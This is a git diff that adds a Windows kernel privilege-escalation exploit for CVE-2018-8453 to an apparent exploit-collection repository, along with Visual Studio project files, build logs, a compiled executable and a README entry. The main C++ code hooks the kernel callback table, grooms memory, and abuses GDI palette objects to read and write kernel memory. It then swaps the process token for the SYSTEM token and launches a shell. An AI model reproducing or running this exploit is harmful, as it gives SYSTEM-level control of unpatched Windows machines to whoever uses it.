+ ReadMem(SystemEPS + gConfig.TokenOffset, 2, &SystemToken);
+ ReadMem(CurrentEPS + gConfig.TokenOffset, 2, &SelfToken);
+
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)(CurrentEPS + gConfig.TokenOffset));
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ printf("[*] Swaping shell.\n\n");
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+ Sleep(500);
+
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SelfToken);
+
+}
+
+void fnDWORDCallBack(PULONG64 msg)
+{
+ if (bMSGSENT && *msg) {
+ bMSGSENT = FALSE;
+ DestroyWindow(hMainWND);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((PULONG64)(*msg)) == (ULONG64)hMainWND)) {
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ DestroyAcceleratorTable(hAccel);
+ for (int i = 1001; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], (PULONG64)SBTrackBUF, 0xD);
+ }
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PULONG64 msg)
+{
+ if (*(PULONG64)*((PULONG64)*(msg - 11)) == (ULONG64)hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ printf("[*] Set Window FNID.\n");
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int main()
+{
+ printf("////////////////////////////////////////////////////////\n");
+ printf("// //\n");
+ printf("// CVE-2018-8453 EXPLOIT //\n");
+ printf("// Date : 2019/1/15 //\n");
+ printf("// Author: ze0r //\n");
+ printf("////////////////////////////////////////////////////////\n\n");
+
+ DWORD OldProtect = 0;
+ PULONG64 CallbackTb = GetKernelCallbackTableBase();
+
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch64)*CallbackTb;
+ *CallbackTb = (ULONG64)fnDWORDCallBack;
+
+ CallbackTb += 124;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch64)*CallbackTb;
+ *CallbackTb = (ULONG64)fnClientFreeWindowClassExtraBytesCallBack;
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+
+ FindHMValidateHandle();
+ memset(MenuName, 0x41, 0xfe0);
+ MenuName[0xfe0] = 0;
+
+ WNDCLASSEXW wndClass = { 0 };
+ wndClass = { 0 };
+ wndClass.cbSize = sizeof(WNDCLASSEXW);
+ wndClass.lpfnWndProc = DefWindowProc;
+ wndClass.cbClsExtra = 0;
+ wndClass.cbWndExtra = 1;
+ wndClass.hInstance = GetModuleHandleA(NULL);
+ wndClass.lpszMenuName = NULL;
+ wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+ RegisterClassExW(&wndClass);
+ printf("[*] CreateWindow.\n");
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+
+ printf("[*] Deploy Memory.\n");
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+ hAccel = CreateAcceleratorTableA(acckey, 12);
+ GetMangerAndWorker();
+ printf("[*] SendMessage.\n");
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ ULONG64 pHDCLinkData = AllocSBTrackMem();
+
+ SetupManger();
+ GetSystem();
+
+ QWORD buf[14];
+ ULONG64 zero = 0;
+ ZeroMemory(buf, 14 * sizeof(ULONG64));
+ ReadMem(pHDCLinkData, 28, buf);
+ if (buf[12] == 0x4444444400005555) {
+ CurrentTagCLSAddr += 0x98;
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&CurrentTagCLSAddr);
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&zero);
+
+ DestroyWindow(hReuseWND);
+ for (int i = 0; i < 3000; i++) {
+ DeleteObject(hDC_Writer);
+ }
+ }
+ else {
+ Sleep(3600 * 1000);
+ }
+
+ return TRUE;
+}
+
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj
new file mode 100644
index 0000000..a14a258
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj
@@ -0,0 +1,169 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}
+ Win32Proj
+ exp
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj.filters b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj.filters
new file mode 100644
index 0000000..48effbf
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj.filters
@@ -0,0 +1,41 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.cpp b/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.cpp
new file mode 100644
index 0000000..f026e66
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// exp.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.h b/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.h
new file mode 100644
index 0000000..baa4bbc
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+
+
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/targetver.h b/CVE-2018-8453/exp_x64_palette_paddress/exp/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/_asm.obj b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/_asm.obj
new file mode 100644
index 0000000..1a5acce
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/_asm.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.Build.CppClean.log b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.Build.CppClean.log
new file mode 100644
index 0000000..4d5e93e
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.Build.CppClean.log
@@ -0,0 +1,25 @@
+c:\users\ze0r\desktop\exp\exp\x64\release\exp.pch
+c:\users\ze0r\desktop\exp\exp\x64\release\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\x64\release\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\x64\release\exp.obj
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.pch
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\vc140.pdb
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\stdafx.obj
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.obj
+c:\users\ze0r\desktop\exp\exp\x64\release\_asm.obj
+c:\users\ze0r\desktop\exp\x64\release\exp.exe
+c:\users\ze0r\desktop\exp\x64\release\exp.ipdb
+c:\users\ze0r\desktop\exp\x64\release\exp.iobj
+c:\users\ze0r\desktop\exp\x64\release\exp.pdb
+c:\users\ze0r\desktop\exp_x64_palette_paddress\x64\release\exp.exe
+c:\users\ze0r\desktop\exp_x64_palette_paddress\x64\release\exp.ipdb
+c:\users\ze0r\desktop\exp_x64_palette_paddress\x64\release\exp.iobj
+c:\users\ze0r\desktop\exp_x64_palette_paddress\x64\release\exp.pdb
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\_asm.obj
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\exp.write.1u.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\link.write.1.tlog
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.log b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.log
new file mode 100644
index 0000000..a5c4ffc
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.log
@@ -0,0 +1,15 @@
+ Assembling _asm.asm...
+ stdafx.cpp
+ exp.cpp
+exp.cpp(93): warning C4311: “类型转换”: 从“BYTE *”到“unsigned int”的指针截断
+exp.cpp(93): warning C4302: “类型转换”: 从“BYTE *”到“unsigned int”截断
+exp.cpp(93): warning C4311: “类型转换”: 从“HMODULE”到“unsigned int”的指针截断
+exp.cpp(93): warning C4302: “类型转换”: 从“HMODULE”到“unsigned int”截断
+exp.cpp(179): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 1 拥有了类型“ULONG64”
+exp.cpp(179): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 2 拥有了类型“ULONG64”
+exp.cpp(266): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 1 拥有了类型“ULONG64”
+ 正在生成代码
+ All 20 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ 已完成代码的生成
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp_x64_palette_paddress\x64\Release\exp.exe
+ exp.vcxproj -> C:\Users\ze0r\Desktop\exp_x64_palette_paddress\x64\Release\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.obj b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.obj
new file mode 100644
index 0000000..b2617e6
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.pch b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.pch
new file mode 100644
index 0000000..77c1677
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.pch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..a1c88d9
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..795dca7
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..5ceccd0
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..e2c03c0
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|x64|C:\Users\ze0r\Desktop\exp_x64_palette_paddress\|
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.write.1u.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.write.1u.tlog
new file mode 100644
index 0000000..7bd5eba
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/exp.write.1u.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..6d501e1
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..0fb6cba
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..6810e25
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/stdafx.obj b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/stdafx.obj
new file mode 100644
index 0000000..37357b1
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/vc140.pdb b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/vc140.pdb
new file mode 100644
index 0000000..03c0b33
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-736257b7/EXP-4dbe2bb1.ipch b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-736257b7/EXP-4dbe2bb1.ipch
new file mode 100644
index 0000000..5227153
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-736257b7/EXP-4dbe2bb1.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4c98b977.ipch b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4c98b977.ipch
new file mode 100644
index 0000000..070307e
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4c98b977.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch
new file mode 100644
index 0000000..5f7d0c6
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-4dbe2bb1.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-c8e60a99.ipch b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-c8e60a99.ipch
new file mode 100644
index 0000000..532b888
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/ipch/EXP-7a579913/EXP-c8e60a99.ipch differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/x64/Release/exp.exe b/CVE-2018-8453/exp_x64_palette_paddress/x64/Release/exp.exe
new file mode 100644
index 0000000..aa974d3
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/x64/Release/exp.exe differ
diff --git a/README.md b/README.md
index 8b9317d..bcfe7eb 100644
--- a/README.md
+++ b/README.md
@@ -11,8 +11,9 @@ windows-kernel-exploits
- [MS17-017](./MS17-017) [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
- [CVE-2017-8464](./CVE-2017-8464) [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)
- [CVE-2017-0213](./CVE-2017-0213) [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
-- [CVE-2018-0833](./CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
-- [CVE-2018-8120](./CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
+- [CVE-2018-0833](./CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
+- [CVE-2018-8120](./CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
+- [CVE-2018-8453](./CVE-2018-8453) [Win32k Elevation of Privilege Vulnerability] (Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers)
- [MS17-010](./MS17-010) [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
- [MS16-135](./MS16-135) [KB3199135] [Windows Kernel Mode Drivers] (2016)
- [MS16-111](./MS16-111) [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)